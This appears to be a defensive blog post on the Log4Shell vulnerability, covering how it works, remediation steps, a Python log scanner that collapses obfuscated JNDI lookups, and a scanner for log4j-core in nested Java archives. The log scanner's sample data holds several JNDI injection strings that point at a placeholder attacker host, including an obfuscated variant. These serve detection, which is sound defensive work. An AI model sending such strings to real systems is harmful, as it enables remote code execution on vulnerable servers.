How does Log4Shell work?

But first it is important to understand the issue. It works like this: if an attacker can get a specific attack string logged through log4j, that string triggers log4j to make a connection to an attacker-controlled host, download a piece of attacker-provided code and execute it. So what kinds of things are logged? Quite a lot, it turns out! It could be a username, an email header, a website cookie; really, anything could get logged somewhere along the way. To complicate things, sometimes things are logged at a later date, or only after a certain number of events have occurred. For instance, some logging mechanism might only log a failed login attempt after 10 or more attempts. So it is difficult to test all possible injection vectors, and it is entirely possible that none of your internet-exposed servers are vulnerable, but a backend internal application server is. The point is, an attacker can spray the strings around and hope they will hit vulnerable components at some point. At the time of this writing, vulnerable products include many mainstream solutions: Jira, Confluence, Splunk, Elastic, VMware vCenter and many, many more. Some are actually security products!
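Because the attack string has to pass through a logger, it also leaves a trace in the logs themselves. The following detector is an added example, not code from the original post: it normalises the nested lookups that detection rules have to cope with (`${lower:…}`, `${upper:…}` and `${…:-default}` forms) and then flags any remaining `${jndi:…}` lookup. The log lines and the `attacker.example` host are constructed sample data.

```python
import re

# Constructed sample log lines (web server access log and an application log).
# The host attacker.example is a placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:12:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:12:03 +0000] "GET /login HTTP/1.1" 401 0 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
    'login failed for user "${jndi:dns://attacker.example/c}" after 10 attempts',
]

# Innermost ${...} lookups: the body contains no further '$', '{' or '}'.
_INNER = re.compile(r'\$\{([^${}]*)\}')

# A JNDI lookup once the obfuscating layers have been collapsed.
_JNDI = re.compile(r'\$\{\s*jndi:[^}]*\}', re.IGNORECASE)


def _resolve(match):
    """Replace one innermost lookup with the literal it would evaluate to.

    Only the obfuscation-only forms are resolved; a jndi lookup (or any
    lookup we do not understand) is returned unchanged so it stays visible.
    """
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith('jndi:'):
        return match.group(0)
    if lowered.startswith('lower:'):
        return body[len('lower:'):].lower()
    if lowered.startswith('upper:'):
        return body[len('upper:'):].upper()
    if ':-' in body:
        # ${env:DOES_NOT_EXIST:-j} and ${::-j} both evaluate to the default "j".
        return body.split(':-', 1)[1]
    return match.group(0)


def normalise(text):
    """Collapse nested lookups from the inside out until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _INNER.sub(_resolve, text)
    return text


def find_jndi_lookups(line):
    """Return every ${jndi:...} lookup present in the normalised line."""
    return _JNDI.findall(normalise(line))


def scan_log(lines):
    """Return (line number, normalised lookup) for every hit in the log."""
    hits = []
    for number, line in enumerate(lines, 1):
        for lookup in find_jndi_lookups(line):
            hits.append((number, lookup))
    return hits


if __name__ == '__main__':
    for number, lookup in scan_log(SAMPLE_LOG_LINES):
        print(f'line {number}: {lookup}')
```

Line 4 of the sample is the case the post warns about: the string was logged by an application only after repeated failed logins, so a detector that watches the web server access log alone would miss it.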

Luckily, the Dutch NCSC is tracking known vulnerable software. They also provide IOCs and mitigations. So instead of providing these here, we will redirect everyone to their repository.

Steps To Take

  1. Figure out where you are using log4j or a vulnerable product that uses log4j. Check the list at regularly because it is updated continuously!
  2. Patch your software, or apply one of the mitigations mentioned in the link to the NCSC GitHub repo. Don’t forget: it’s not just internet-facing systems that can be attacked.
  3. If you can’t patch or mitigate, make sure that a vulnerable server cannot make an internet connection as a temporary solution.
  4. Configure your IDS and SIEM to block the IOCs and implement detection rules; again, we refer to for this information (and keep it up to date, because there are also many ways to bypass the detection rules).
  5. If you have indications of compromise of a server, take standard incident response and forensic measures: isolate, contain and investigate.
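Step 1 is the hard part in practice, because log4j is usually not installed on its own but shipped inside application archives, often nested (a jar inside a war). The inventory scanner below is an added example, not the post's own tooling or the NCSC list: it walks a directory tree, opens every jar/war/ear, recurses into nested archives in memory, and reports each one that ships the `JndiLookup` class together with the version from its Maven `pom.properties`. The sample tree it builds contains constructed stand-in archives (dummy class bytes, placeholder version `2.0-SAMPLE`); it complements, not replaces, the vendor list.

```python
import io
import os
import tempfile
import zipfile

ARCHIVE_EXTS = ('.jar', '.war', '.ear', '.zip')
# The class that performs the JNDI lookup, and the Maven metadata log4j-core ships with.
JNDI_LOOKUP_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
POM_PROPS = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'


def _log4j_version(zf):
    """Return the log4j-core version from pom.properties, or None if absent."""
    try:
        props = zf.read(POM_PROPS).decode('utf-8', 'replace')
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith('version='):
            return line.split('=', 1)[1].strip()
    return None


def inspect_archive(fileobj, label):
    """Return (label, version) for this archive and any nested archive containing JndiLookup."""
    findings = []
    try:
        zf = zipfile.ZipFile(fileobj)
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP_CLASS in names:
            findings.append((label, _log4j_version(zf)))
        for name in names:
            if name.lower().endswith(ARCHIVE_EXTS):
                # Nested archive: read it into memory and recurse, Java-style "outer!inner" label.
                findings.extend(inspect_archive(io.BytesIO(zf.read(name)), f'{label}!{name}'))
    return findings


def scan_tree(root):
    """Scan every archive below root; results are sorted by path for stable reporting."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, filename)
                with open(path, 'rb') as fh:
                    findings.extend(inspect_archive(fh, os.path.relpath(path, root)))
    return sorted(findings)


def _make_log4j_core_jar():
    """Bytes of a constructed stand-in for a log4j-core jar (dummy class content)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b'\xca\xfe\xba\xbe')  # constructed, not a real class file
        zf.writestr(POM_PROPS, 'version=2.0-SAMPLE\n')      # placeholder version string
    return buf.getvalue()


def build_sample_tree():
    """Create a temporary directory with one clean jar, one log4j-core jar and a war nesting it."""
    root = tempfile.mkdtemp(prefix='log4shell-inventory-')
    os.makedirs(os.path.join(root, 'lib'))
    core = _make_log4j_core_jar()
    with open(os.path.join(root, 'lib', 'log4j-core.jar'), 'wb') as fh:
        fh.write(core)
    with zipfile.ZipFile(os.path.join(root, 'lib', 'clean-lib.jar'), 'w') as zf:
        zf.writestr('com/example/Clean.class', b'\xca\xfe\xba\xbe')
    with zipfile.ZipFile(os.path.join(root, 'app.war'), 'w') as zf:
        zf.writestr('WEB-INF/lib/log4j-core.jar', core)
    return root


if __name__ == '__main__':
    for label, version in scan_tree(build_sample_tree()):
        print(f'{label}: log4j-core {version or "unknown"}')
```

Run it against a real deployment by calling `scan_tree('/opt')` (or wherever your applications live); a version of `None` means the archive carries `JndiLookup` but no Maven metadata, so it needs a manual look rather than being treated as clean.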

Asset Management

It is clear that most organizations are currently at risk, since the exploit is so easy and the vulnerability so widespread. Knowing what you have (asset management) is extremely important, and so is knowing what software components you use (SBOM, see